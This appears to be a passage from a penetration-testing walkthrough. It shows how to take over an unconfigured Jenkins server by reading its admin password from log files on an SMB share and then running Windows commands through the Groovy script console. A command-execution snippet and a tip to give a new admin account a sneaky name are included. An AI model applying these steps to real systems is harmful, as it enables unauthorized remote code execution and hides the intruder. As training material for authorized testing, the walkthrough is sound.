This Jenkins server appears to have been installed but never fully configured. This is acctually common with software that ships with other software.

The web console tells us that there is an admin password written somewhere in a directory we don’t have access to. However, it also mentions the file is written to the Jenkins log.
Connect back to the SMB share we accessed previously. Take a look inside the Jenkins directory.

There appear to be three files with the .log extention. Download them both. Looking inside the err log file we can see the one-time admin password.

Here we can see the temporary admin password just as expected f9d8aa****************321f63c6fa.
:WARNING: You should have full resolution screenshots with timestamps of every action you take to setup this Jenkins server

Click on the big “Install suggested plugins” button

Once the installation wizard finishes select “Skip and continue as admin”. Alternitively you could create an admin user, maybe name it richard.f if you’re trying to be sneaky.

Nothing to do here just click on the “Save and Finish” button.

Contratulations you are now the Jenkins administrator and this server is ready for use. Click on “Start using Jenkins”.

:WARNING: You should have full resolution screenshots with timestamps of every action you took to setup this Jenkins server
Now that we have admin access to the Jenkins web console we can ensure that the script console is turned on. This will allow us to command the underlying operating system using whatever permissions this Jenkins server is currently running with.
With the script console enabled (it’s enabled by default), executing OS commands is trivial using Groovyscript
def sout = new StringBuffer(), serr = new StringBuffer();
def proc = 'cmd.exe /c dir'.execute();
proc.consumeProcessOutput(sout, serr);
proc.waitForOrKill(1000);
println "out> $sout err> $serr"

Now you can just update cmd.exe /c dir to whatever Windows command you want to run.
